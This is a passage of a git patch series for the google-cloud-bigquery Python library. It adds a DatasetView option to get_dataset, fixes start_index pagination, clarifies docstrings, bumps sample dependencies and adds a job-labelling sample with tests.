"DATASET_VIEW_UNSPECIFIED" + """The default value. Currently maps to the FULL view.""" + + METADATA = "METADATA" + """View metadata information for the dataset, such as friendlyName, + description, labels, etc.""" + + ACL = "ACL" + """View ACL information for the dataset, which defines dataset access + for one or more entities.""" + + FULL = "FULL" + """View both dataset metadata and ACL information.""" + + class DefaultPandasDTypes(enum.Enum): """Default Pandas DataFrem DTypes to convert BigQuery data. 
These Sentinel values are used instead of None to maintain backward compatibility, diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index ed092bcdb..42bfc84b9 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -61,7 +61,7 @@ from google.cloud.bigquery import job as bqjob import google.cloud.bigquery._job_helpers from google.cloud.bigquery.dataset import DatasetReference, Dataset -from google.cloud.bigquery.enums import UpdateMode +from google.cloud.bigquery.enums import UpdateMode, DatasetView from google.cloud.bigquery import exceptions from google.cloud.bigquery import ParquetOptions import google.cloud.bigquery.retry @@ -753,7 +753,7 @@ def test_get_dataset(self): final_attributes.assert_called_once_with({"path": "/%s" % path}, client, None) conn.api_request.assert_called_once_with( - method="GET", path="/%s" % path, timeout=7.5 + method="GET", path="/%s" % path, timeout=7.5, query_params={} ) self.assertEqual(dataset.dataset_id, self.DS_ID) @@ -819,6 +819,72 @@ def test_get_dataset(self): self.assertEqual(dataset.dataset_id, self.DS_ID) + def test_get_dataset_with_dataset_view(self): + path = "projects/%s/datasets/%s" % (self.PROJECT, self.DS_ID) + creds = _make_credentials() + http = object() + client = self._make_one(project=self.PROJECT, credentials=creds, _http=http) + resource = { + "id": "%s:%s" % (self.PROJECT, self.DS_ID), + "datasetReference": {"projectId": self.PROJECT, "datasetId": self.DS_ID}, + } + dataset_ref = DatasetReference(self.PROJECT, self.DS_ID) + + test_cases = [ + (None, None), + (DatasetView.DATASET_VIEW_UNSPECIFIED, "DATASET_VIEW_UNSPECIFIED"), + (DatasetView.METADATA, "METADATA"), + (DatasetView.ACL, "ACL"), + (DatasetView.FULL, "FULL"), + ] + + for dataset_view_arg, expected_param_value in test_cases: + with self.subTest( + dataset_view_arg=dataset_view_arg, + expected_param_value=expected_param_value, + ): + # Re-initialize the connection mock for each sub-test to reset side_effect + conn = 
client._connection = make_connection(resource) + + dataset = client.get_dataset(dataset_ref, dataset_view=dataset_view_arg) + + self.assertEqual(dataset.dataset_id, self.DS_ID) + + if expected_param_value: + expected_query_params = {"datasetView": expected_param_value} + else: + expected_query_params = {} + + conn.api_request.assert_called_once_with( + method="GET", + path="/%s" % path, + timeout=DEFAULT_TIMEOUT, + query_params=expected_query_params if expected_query_params else {}, + ) + + def test_get_dataset_with_invalid_dataset_view(self): + invalid_view_values = [ + "INVALID_STRING", + 123, + 123.45, + object(), + ] + creds = _make_credentials() + http = object() + client = self._make_one(project=self.PROJECT, credentials=creds, _http=http) + resource = { + "id": "%s:%s" % (self.PROJECT, self.DS_ID), + "datasetReference": {"projectId": self.PROJECT, "datasetId": self.DS_ID}, + } + conn = client._connection = make_connection(resource) + dataset_ref = DatasetReference(self.PROJECT, self.DS_ID) + + for invalid_view_value in invalid_view_values: + with self.subTest(invalid_view_value=invalid_view_value): + conn.api_request.reset_mock() # Reset mock for each sub-test + with self.assertRaises(AttributeError): + client.get_dataset(dataset_ref, dataset_view=invalid_view_value) + def test_ensure_bqstorage_client_creating_new_instance(self): bigquery_storage = pytest.importorskip("google.cloud.bigquery_storage") diff --git a/tests/unit/test_create_dataset.py b/tests/unit/test_create_dataset.py index bd7c6a8f8..b144471ca 100644 --- a/tests/unit/test_create_dataset.py +++ b/tests/unit/test_create_dataset.py @@ -372,7 +372,12 @@ def test_create_dataset_alreadyexists_w_exists_ok_true(PROJECT, DS_ID, LOCATION) }, timeout=DEFAULT_TIMEOUT, ), - mock.call(method="GET", path=get_path, timeout=DEFAULT_TIMEOUT), + mock.call( + method="GET", + path=get_path, + timeout=DEFAULT_TIMEOUT, + query_params={}, + ), ] ) From 0378caa0fdaeec23929b179ca62a7199a8a6098d Mon Sep 17 00:00:00 2001 
From: Mend Renovate Date: Thu, 5 Jun 2025 00:19:15 +0200 Subject: [PATCH 126/202] chore(deps): update all dependencies (#2209) * chore(deps): update all dependencies * pin geopandas===1.0.1 for python <= 3.9 --------- Co-authored-by: Lingqing Gan --- samples/desktopapp/requirements-test.txt | 2 +- samples/geography/requirements-test.txt | 2 +- samples/geography/requirements.txt | 9 +++++---- samples/magics/requirements-test.txt | 2 +- samples/notebooks/requirements-test.txt | 2 +- samples/notebooks/requirements.txt | 2 +- samples/snippets/requirements-test.txt | 2 +- 7 files changed, 11 insertions(+), 10 deletions(-) diff --git a/samples/desktopapp/requirements-test.txt b/samples/desktopapp/requirements-test.txt index 2ad35b418..4b9c515a7 100644 --- a/samples/desktopapp/requirements-test.txt +++ b/samples/desktopapp/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.6.4 -pytest==8.3.5 +pytest==8.4.0 mock==5.2.0 pytest-xdist==3.7.0 diff --git a/samples/geography/requirements-test.txt b/samples/geography/requirements-test.txt index 3ca365401..824a1df4a 100644 --- a/samples/geography/requirements-test.txt +++ b/samples/geography/requirements-test.txt @@ -1,3 +1,3 @@ -pytest==8.3.5 +pytest==8.4.0 mock==5.2.0 pytest-xdist==3.7.0 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 049e88237..5ff1c0c02 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -9,8 +9,9 @@ cligj==0.7.2 db-dtypes==1.4.3 Fiona==1.10.1 geojson==3.2.0 -geopandas==1.0.1 -google-api-core==2.24.2 +geopandas===1.0.1; python_version <= '3.9' +geopandas==1.1.0; python_version >= '3.10' +google-api-core==2.25.0 google-auth==2.40.2 google-cloud-bigquery==3.34.0 google-cloud-bigquery-storage==2.32.0 @@ -18,7 +19,7 @@ google-cloud-core==2.4.3 google-crc32c==1.7.1 google-resumable-media==2.7.2 googleapis-common-protos==1.70.0 -grpcio==1.71.0 +grpcio==1.72.1 idna==3.10 munch==4.0.0 mypy-extensions==1.1.0 @@ -38,6 +39,6 
@@ rsa==4.9.1 Shapely===2.0.7; python_version == '3.9' Shapely==2.1.1; python_version >= '3.10' six==1.17.0 -typing-extensions==4.13.2 +typing-extensions==4.14.0 typing-inspect==0.9.0 urllib3==2.4.0 diff --git a/samples/magics/requirements-test.txt b/samples/magics/requirements-test.txt index 2ad35b418..4b9c515a7 100644 --- a/samples/magics/requirements-test.txt +++ b/samples/magics/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.6.4 -pytest==8.3.5 +pytest==8.4.0 mock==5.2.0 pytest-xdist==3.7.0 diff --git a/samples/notebooks/requirements-test.txt b/samples/notebooks/requirements-test.txt index 2ad35b418..4b9c515a7 100644 --- a/samples/notebooks/requirements-test.txt +++ b/samples/notebooks/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.6.4 -pytest==8.3.5 +pytest==8.4.0 mock==5.2.0 pytest-xdist==3.7.0 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index 27eb7459a..c3feffb35 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -3,7 +3,7 @@ db-dtypes==1.4.3 google-cloud-bigquery==3.34.0 google-cloud-bigquery-storage==2.32.0 ipython===8.18.1; python_version == '3.9' -ipython==9.2.0; python_version >= '3.10' +ipython==9.3.0; python_version >= '3.10' matplotlib===3.9.2; python_version == '3.9' matplotlib==3.10.3; python_version >= '3.10' pandas==2.2.3 diff --git a/samples/snippets/requirements-test.txt b/samples/snippets/requirements-test.txt index 767f71fb1..d311187ec 100644 --- a/samples/snippets/requirements-test.txt +++ b/samples/snippets/requirements-test.txt @@ -1,5 +1,5 @@ # samples/snippets should be runnable with no "extras" google-cloud-testutils==1.6.4 -pytest==8.3.5 +pytest==8.4.0 mock==5.2.0 pytest-xdist==3.7.0 From 45643a2e20ce5d503118522dd195aeca00dec3bc Mon Sep 17 00:00:00 2001 From: Lingqing Gan Date: Thu, 5 Jun 2025 11:01:02 -0700 Subject: [PATCH 127/202] fix: fix rows returned when both start_index and page_size are provided (#2181) * fix: fix 
total rows returned when both start_index and page_size are provided * use shallow copy and add comments * add docstring * add unit test * lint * add comment --------- Co-authored-by: Chalmer Lowe --- google/cloud/bigquery/client.py | 9 +++- google/cloud/bigquery/job/query.py | 8 ++++ google/cloud/bigquery/table.py | 11 ++++- tests/unit/job/test_query.py | 72 ++++++++++++++++++++++++++++++ 4 files changed, 97 insertions(+), 3 deletions(-) diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index bb4d80c73..811e9ef03 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -2045,6 +2045,7 @@ def _get_query_results( location: Optional[str] = None, timeout: TimeoutType = DEFAULT_TIMEOUT, page_size: int = 0, + start_index: Optional[int] = None, ) -> _QueryResults: """Get the query results object for a query job. @@ -2063,9 +2064,12 @@ def _get_query_results( before using ``retry``. If set, this connection timeout may be increased to a minimum value. This prevents retries on what would otherwise be a successful response. - page_size (int): + page_size (Optional[int]): Maximum number of rows in a single response. See maxResults in the jobs.getQueryResults REST API. + start_index (Optional[int]): + Zero-based index of the starting row. See startIndex in the + jobs.getQueryResults REST API. 
Returns: google.cloud.bigquery.query._QueryResults: @@ -2095,6 +2099,9 @@ def _get_query_results( if location is not None: extra_params["location"] = location + if start_index is not None: + extra_params["startIndex"] = start_index + path = "/projects/{}/queries/{}".format(project, job_id) # This call is typically made in a polling loop that checks whether the diff --git a/google/cloud/bigquery/job/query.py b/google/cloud/bigquery/job/query.py index 954a46963..4d95f0e71 100644 --- a/google/cloud/bigquery/job/query.py +++ b/google/cloud/bigquery/job/query.py @@ -1409,6 +1409,7 @@ def _reload_query_results( retry: "retries.Retry" = DEFAULT_RETRY, timeout: Optional[float] = None, page_size: int = 0, + start_index: Optional[int] = None, ): """Refresh the cached query results unless already cached and complete. @@ -1421,6 +1422,9 @@ def _reload_query_results( page_size (int): Maximum number of rows in a single response. See maxResults in the jobs.getQueryResults REST API. + start_index (Optional[int]): + Zero-based index of the starting row. See startIndex in the + jobs.getQueryResults REST API. """ # Optimization: avoid a call to jobs.getQueryResults if it's already # been fetched, e.g. from jobs.query first page of results. 
@@ -1468,6 +1472,7 @@ def _reload_query_results( location=self.location, timeout=transport_timeout, page_size=page_size, + start_index=start_index, ) def result( # type: ignore # (incompatible with supertype) @@ -1570,6 +1575,9 @@ def result( # type: ignore # (incompatible with supertype) if page_size is not None: reload_query_results_kwargs["page_size"] = page_size + if start_index is not None: + reload_query_results_kwargs["start_index"] = start_index + try: retry_do_query = getattr(self, "_retry_do_query", None) if retry_do_query is not None: diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 3ffd5ca56..861f806b4 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -1987,12 +1987,19 @@ def _get_next_page_response(self): return response params = self._get_query_params() + + # If the user has provided page_size and start_index, we need to pass + # start_index for the first page, but for all subsequent pages, we + # should not pass start_index. We make a shallow copy of params and do + # not alter the original, so if the user iterates the results again, + # start_index is preserved. 
+ params_copy = copy.copy(params) if self._page_size is not None: if self.page_number and "startIndex" in params: - del params["startIndex"] + del params_copy["startIndex"] return self.api_request( - method=self._HTTP_METHOD, path=self.path, query_params=params + method=self._HTTP_METHOD, path=self.path, query_params=params_copy ) @property diff --git a/tests/unit/job/test_query.py b/tests/unit/job/test_query.py index 1df65279d..46b802aa3 100644 --- a/tests/unit/job/test_query.py +++ b/tests/unit/job/test_query.py @@ -1682,6 +1682,78 @@ def test_result_with_start_index(self): tabledata_list_request[1]["query_params"]["maxResults"], page_size ) + def test_result_with_start_index_multi_page(self): + # When there are multiple pages of response and the user has set + # start_index, we should supply start_index to the server in the first + # request. However, in the subsequent requests, we will pass only + # page_token but not start_index, because the server only allows one + # of them. + from google.cloud.bigquery.table import RowIterator + + query_resource = { + "jobComplete": True, + "jobReference": {"projectId": self.PROJECT, "jobId": self.JOB_ID}, + "schema": {"fields": [{"name": "col1", "type": "STRING"}]}, + "totalRows": "7", + } + + # Although the result has 7 rows, the response only returns 6, because + # start_index is 1. 
+ tabledata_resource_1 = { + "totalRows": "7", + "pageToken": "page_token_1", + "rows": [ + {"f": [{"v": "abc"}]}, + {"f": [{"v": "def"}]}, + {"f": [{"v": "ghi"}]}, + ], + } + tabledata_resource_2 = { + "totalRows": "7", + "pageToken": None, + "rows": [ + {"f": [{"v": "jkl"}]}, + {"f": [{"v": "mno"}]}, + {"f": [{"v": "pqe"}]}, + ], + } + + connection = make_connection( + query_resource, tabledata_resource_1, tabledata_resource_2 + ) + client = _make_client(self.PROJECT, connection=connection) + resource = self._make_resource(ended=True) + job = self._get_target_class().from_api_repr(resource, client) + + start_index = 1 + page_size = 3 + + result = job.result(page_size=page_size, start_index=start_index) + + self.assertIsInstance(result, RowIterator) + self.assertEqual(result.total_rows, 7) + + rows = list(result) + + self.assertEqual(len(rows), 6) + self.assertEqual(len(connection.api_request.call_args_list), 3) + + # First call has both startIndex and maxResults. + tabledata_list_request_1 = connection.api_request.call_args_list[1] + self.assertEqual( + tabledata_list_request_1[1]["query_params"]["startIndex"], start_index + ) + self.assertEqual( + tabledata_list_request_1[1]["query_params"]["maxResults"], page_size + ) + + # Second call only has maxResults. 
+ tabledata_list_request_2 = connection.api_request.call_args_list[2] + self.assertFalse("startIndex" in tabledata_list_request_2[1]["query_params"]) + self.assertEqual( + tabledata_list_request_2[1]["query_params"]["maxResults"], page_size + ) + def test_result_error(self): from google.cloud import exceptions From bd5aba8ba40c2f35fb672a68eed11d6baedb304f Mon Sep 17 00:00:00 2001 From: Lingqing Gan Date: Thu, 5 Jun 2025 12:01:06 -0700 Subject: [PATCH 128/202] docs: Improve clarity of "Output Only" fields in Dataset class (#2201) fixes b/407210727 --- google/cloud/bigquery/dataset.py | 20 ++++++++++++-------- 1 file changed, 12 insertions(+), 8 deletions(-) diff --git a/google/cloud/bigquery/dataset.py b/google/cloud/bigquery/dataset.py index f788275cd..ec4098511 100644 --- a/google/cloud/bigquery/dataset.py +++ b/google/cloud/bigquery/dataset.py @@ -574,6 +574,10 @@ class Dataset(object): A pointer to a dataset. If ``dataset_ref`` is a string, it must include both the project ID and the dataset ID, separated by ``.``. + + Note: + Fields marked as "Output Only" are populated by the server and will only be + available after calling :meth:`google.cloud.bigquery.client.Client.get_dataset`. """ _PROPERTY_TO_API_FIELD = { @@ -692,7 +696,7 @@ def access_entries(self, value): @property def created(self): - """Union[datetime.datetime, None]: Datetime at which the dataset was + """Union[datetime.datetime, None]: Output only. Datetime at which the dataset was created (:data:`None` until set from the server). """ creation_time = self._properties.get("creationTime") @@ -709,8 +713,8 @@ def dataset_id(self): @property def full_dataset_id(self): - """Union[str, None]: ID for the dataset resource (:data:`None` until - set from the server) + """Union[str, None]: Output only. ID for the dataset resource + (:data:`None` until set from the server). In the format ``project_id:dataset_id``. 
""" @@ -725,14 +729,14 @@ def reference(self): @property def etag(self): - """Union[str, None]: ETag for the dataset resource (:data:`None` until - set from the server). + """Union[str, None]: Output only. ETag for the dataset resource + (:data:`None` until set from the server). """ return self._properties.get("etag") @property def modified(self): - """Union[datetime.datetime, None]: Datetime at which the dataset was + """Union[datetime.datetime, None]: Output only. Datetime at which the dataset was last modified (:data:`None` until set from the server). """ modified_time = self._properties.get("lastModifiedTime") @@ -744,8 +748,8 @@ def modified(self): @property def self_link(self): - """Union[str, None]: URL for the dataset resource (:data:`None` until - set from the server). + """Union[str, None]: Output only. URL for the dataset resource + (:data:`None` until set from the server). """ return self._properties.get("selfLink") From 99493bfb0d6230b9a04583d2b9dc40bc84ffdc49 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Mon, 9 Jun 2025 12:31:37 -0400 Subject: [PATCH 129/202] test: remove pragma (#2212) * test: remove pragma * test: remove comment about pragma * updates to conditionals related to pandas 2.0+ tests --- google/cloud/bigquery/_pandas_helpers.py | 9 ++------- tests/unit/job/test_query_pandas.py | 12 +++++------- tests/unit/test_table_pandas.py | 14 ++++++-------- 3 files changed, 13 insertions(+), 22 deletions(-) diff --git a/google/cloud/bigquery/_pandas_helpers.py b/google/cloud/bigquery/_pandas_helpers.py index 10a5c59bb..2dab03a06 100644 --- a/google/cloud/bigquery/_pandas_helpers.py +++ b/google/cloud/bigquery/_pandas_helpers.py @@ -337,13 +337,8 @@ def types_mapper(arrow_data_type): ): return range_date_dtype - # TODO: this section does not have a test yet OR at least not one that is - # recognized by coverage, hence the pragma. 
See Issue: #2132 - elif ( - range_timestamp_dtype is not None - and arrow_data_type.equals( # pragma: NO COVER - range_timestamp_dtype.pyarrow_dtype - ) + elif range_timestamp_dtype is not None and arrow_data_type.equals( + range_timestamp_dtype.pyarrow_dtype ): return range_timestamp_dtype diff --git a/tests/unit/job/test_query_pandas.py b/tests/unit/job/test_query_pandas.py index d82f0dfe3..a6c59b158 100644 --- a/tests/unit/job/test_query_pandas.py +++ b/tests/unit/job/test_query_pandas.py @@ -647,12 +647,6 @@ def test_to_dataframe_bqstorage_no_pyarrow_compression(): ) -# TODO: The test needs work to account for pandas 2.0+. See Issue: #2132 -# pragma added due to issues with coverage. -@pytest.mark.skipif( - pandas.__version__.startswith("2."), - reason="pandas 2.0 changes some default dtypes and we haven't update the test to account for those", -) @pytest.mark.skipif(pyarrow is None, reason="Requires `pyarrow`") def test_to_dataframe_column_dtypes(): from google.cloud.bigquery.job import QueryJob as target_class @@ -704,7 +698,6 @@ def test_to_dataframe_column_dtypes(): exp_columns = [field["name"] for field in query_resource["schema"]["fields"]] assert list(df) == exp_columns # verify the column names - assert df.start_timestamp.dtype.name == "datetime64[ns, UTC]" assert df.seconds.dtype.name == "Int64" assert df.miles.dtype.name == "float64" assert df.km.dtype.name == "float16" @@ -712,6 +705,11 @@ def test_to_dataframe_column_dtypes(): assert df.complete.dtype.name == "boolean" assert df.date.dtype.name == "dbdate" + if pandas.__version__.startswith("2."): + assert df.start_timestamp.dtype.name == "datetime64[us, UTC]" + else: + assert df.start_timestamp.dtype.name == "datetime64[ns, UTC]" + def test_to_dataframe_column_date_dtypes(): from google.cloud.bigquery.job import QueryJob as target_class diff --git a/tests/unit/test_table_pandas.py b/tests/unit/test_table_pandas.py index 43d64d77d..a4fa3fa39 100644 --- a/tests/unit/test_table_pandas.py +++ 
b/tests/unit/test_table_pandas.py @@ -34,12 +34,6 @@ def class_under_test(): return RowIterator -# TODO: The test needs work to account for pandas 2.0+. See Issue: #2132 -# pragma added due to issues with coverage. -@pytest.mark.skipif( - pandas.__version__.startswith("2."), - reason="pandas 2.0 changes some default dtypes and we haven't update the test to account for those", -) def test_to_dataframe_nullable_scalars( monkeypatch, class_under_test ): # pragma: NO COVER @@ -113,14 +107,18 @@ def test_to_dataframe_nullable_scalars( assert df.dtypes["bool_col"].name == "boolean" assert df.dtypes["bytes_col"].name == "object" assert df.dtypes["date_col"].name == "dbdate" - assert df.dtypes["datetime_col"].name == "datetime64[ns]" assert df.dtypes["float64_col"].name == "float64" assert df.dtypes["int64_col"].name == "Int64" assert df.dtypes["numeric_col"].name == "object" assert df.dtypes["string_col"].name == "object" assert df.dtypes["time_col"].name == "dbtime" - assert df.dtypes["timestamp_col"].name == "datetime64[ns, UTC]" assert df.dtypes["json_col"].name == "object" + if pandas.__version__.startswith("2."): + assert df.dtypes["datetime_col"].name == "datetime64[us]" + assert df.dtypes["timestamp_col"].name == "datetime64[us, UTC]" + else: + assert df.dtypes["datetime_col"].name == "datetime64[ns]" + assert df.dtypes["timestamp_col"].name == "datetime64[ns, UTC]" # Check for expected values. 
assert df["bignumeric_col"][0] == decimal.Decimal("123.456789101112131415") From dc374b4e22de98850c54643a58bb9e80f865dcf7 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Mon, 9 Jun 2025 18:58:40 +0200 Subject: [PATCH 130/202] chore(deps): update all dependencies (#2211) Co-authored-by: Chalmer Lowe --- samples/geography/requirements.txt | 6 +++--- samples/magics/requirements.txt | 2 +- samples/notebooks/requirements.txt | 2 +- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 5ff1c0c02..4ebff482d 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -12,19 +12,19 @@ geojson==3.2.0 geopandas===1.0.1; python_version <= '3.9' geopandas==1.1.0; python_version >= '3.10' google-api-core==2.25.0 -google-auth==2.40.2 +google-auth==2.40.3 google-cloud-bigquery==3.34.0 google-cloud-bigquery-storage==2.32.0 google-cloud-core==2.4.3 google-crc32c==1.7.1 google-resumable-media==2.7.2 googleapis-common-protos==1.70.0 -grpcio==1.72.1 +grpcio==1.73.0 idna==3.10 munch==4.0.0 mypy-extensions==1.1.0 packaging==25.0 -pandas==2.2.3 +pandas==2.3.0 proto-plus==1.26.1 pyarrow==20.0.0 pyasn1==0.6.1 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index 960eb6db4..d2456fc5a 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -3,4 +3,4 @@ db-dtypes==1.4.3 google.cloud.bigquery==3.34.0 google-cloud-bigquery-storage==2.32.0 ipython===8.18.1 -pandas==2.2.3 +pandas==2.3.0 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index c3feffb35..66409e49d 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -6,4 +6,4 @@ ipython===8.18.1; python_version == '3.9' ipython==9.3.0; python_version >= '3.10' matplotlib===3.9.2; python_version == '3.9' matplotlib==3.10.3; python_version >= '3.10' -pandas==2.2.3 +pandas==2.3.0 From 
5a0fbf5cca551626d3cb49f934369049450546c1 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Mon, 9 Jun 2025 20:53:46 +0200 Subject: [PATCH 131/202] chore(deps): update dependency requests to v2.32.4 (#2213) --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 4ebff482d..75a196eeb 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -34,7 +34,7 @@ pyparsing==3.2.3 python-dateutil==2.9.0.post0 pytz==2025.2 PyYAML==6.0.2 -requests==2.32.3 +requests==2.32.4 rsa==4.9.1 Shapely===2.0.7; python_version == '3.9' Shapely==2.1.1; python_version >= '3.10' From 96b067da092836f0d8e19d5df683a0e5680caee8 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Fri, 13 Jun 2025 19:49:19 +0200 Subject: [PATCH 132/202] chore(deps): update dependency google-api-core to v2.25.1 (#2215) --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 75a196eeb..daaf67b9e 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -11,7 +11,7 @@ Fiona==1.10.1 geojson==3.2.0 geopandas===1.0.1; python_version <= '3.9' geopandas==1.1.0; python_version >= '3.10' -google-api-core==2.25.0 +google-api-core==2.25.1 google-auth==2.40.3 google-cloud-bigquery==3.34.0 google-cloud-bigquery-storage==2.32.0 From 4fbb37595f0e148b7912f26ac8e48a996a6cbae6 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Fri, 20 Jun 2025 14:36:25 -0700 Subject: [PATCH 133/202] chore(deps): bump urllib3 from 2.4.0 to 2.5.0 in /samples/geography (#2220) Bumps [urllib3](https://github.com/urllib3/urllib3) from 2.4.0 to 2.5.0. 
- [Release notes](https://github.com/urllib3/urllib3/releases) - [Changelog](https://github.com/urllib3/urllib3/blob/main/CHANGES.rst) - [Commits](https://github.com/urllib3/urllib3/compare/2.4.0...2.5.0) --- updated-dependencies: - dependency-name: urllib3 dependency-version: 2.5.0 dependency-type: direct:production ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index daaf67b9e..379d682b4 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -41,4 +41,4 @@ Shapely==2.1.1; python_version >= '3.10' six==1.17.0 typing-extensions==4.14.0 typing-inspect==0.9.0 -urllib3==2.4.0 +urllib3==2.5.0 From 6e70fe2c4c0bec6d6aeb16ab5a83b01746e8c64a Mon Sep 17 00:00:00 2001 From: "Leah E. Cole" <6719667+leahecole@users.noreply.github.com> Date: Mon, 23 Jun 2025 11:50:33 -0400 Subject: [PATCH 134/202] chore: add label job sample (#2219) * chore: add label job sample * lint * remove unnecessary api call * Apply suggestions from code review Co-authored-by: Chalmer Lowe --------- Co-authored-by: Chalmer Lowe --- samples/snippets/label_job.py | 36 ++++++++++++++++++++++++++++++ samples/snippets/label_job_test.py | 31 +++++++++++++++++++++++++ 2 files changed, 67 insertions(+) create mode 100644 samples/snippets/label_job.py create mode 100644 samples/snippets/label_job_test.py diff --git a/samples/snippets/label_job.py b/samples/snippets/label_job.py new file mode 100644 index 000000000..cfd06d189 --- /dev/null +++ b/samples/snippets/label_job.py @@ -0,0 +1,36 @@ +# Copyright 2025 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. 
+# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + + +def label_job() -> None: + # [START bigquery_label_job] + from google.cloud import bigquery + + client = bigquery.Client() + + sql = """ + SELECT corpus + FROM `bigquery-public-data.samples.shakespeare` + GROUP BY corpus; + """ + labels = {"color": "green"} + + config = bigquery.QueryJobConfig() + config.labels = labels + location = "us" + job = client.query(sql, location=location, job_config=config) + job_id = job.job_id + + print(f"Added {job.labels} to {job_id}.") + # [END bigquery_label_job] diff --git a/samples/snippets/label_job_test.py b/samples/snippets/label_job_test.py new file mode 100644 index 000000000..0780db61a --- /dev/null +++ b/samples/snippets/label_job_test.py @@ -0,0 +1,31 @@ +# Copyright 2025 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +import typing + +import label_job # type: ignore + + +if typing.TYPE_CHECKING: + import pytest + + +def test_label_job( + capsys: "pytest.CaptureFixture[str]", +) -> None: + label_job.label_job() + + out, _ = capsys.readouterr() + assert "color" in out + assert "green" in out From cd2e1387c98e9df74ec85b1f3a3aba371d9ad7b8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ra=C3=BAl=20Cumplido?= Date: Mon, 23 Jun 2025 20:32:50 +0200 Subject: [PATCH 135/202] chore: update PyPI URL for official nightly pyarrow repository (#2223) Co-authored-by: Lingqing Gan --- noxfile.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/noxfile.py b/noxfile.py index 6807b7ee4..eb79c238d 100644 --- a/noxfile.py +++ b/noxfile.py @@ -408,10 +408,10 @@ def prerelease_deps(session): ) # PyArrow prerelease packages are published to an alternative PyPI host. - # https://arrow.apache.org/docs/python/install.html#installing-nightly-packages + # https://arrow.apache.org/docs/developers/python.html#installing-nightly-packages session.install( "--extra-index-url", - "https://pypi.fury.io/arrow-nightlies/", + "https://pypi.anaconda.org/scientific-python-nightly-wheels/simple", "--prefer-binary", "--pre", "--upgrade", From 7c9e7fde1d710641c27247fa5f5271c86a9be2b1 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Wed, 25 Jun 2025 19:08:09 +0200 Subject: [PATCH 136/202] chore(deps): update all dependencies (#2216) Co-authored-by: Lingqing Gan --- samples/desktopapp/requirements-test.txt | 2 +- samples/geography/requirements-test.txt | 2 +- samples/geography/requirements.txt | 2 +- samples/magics/requirements-test.txt | 2 +- samples/notebooks/requirements-test.txt | 2 +- samples/snippets/requirements-test.txt | 2 +- 6 files changed, 6 insertions(+), 6 deletions(-) diff --git a/samples/desktopapp/requirements-test.txt b/samples/desktopapp/requirements-test.txt index 4b9c515a7..b3046227c 100644 --- a/samples/desktopapp/requirements-test.txt +++ b/samples/desktopapp/requirements-test.txt @@ 
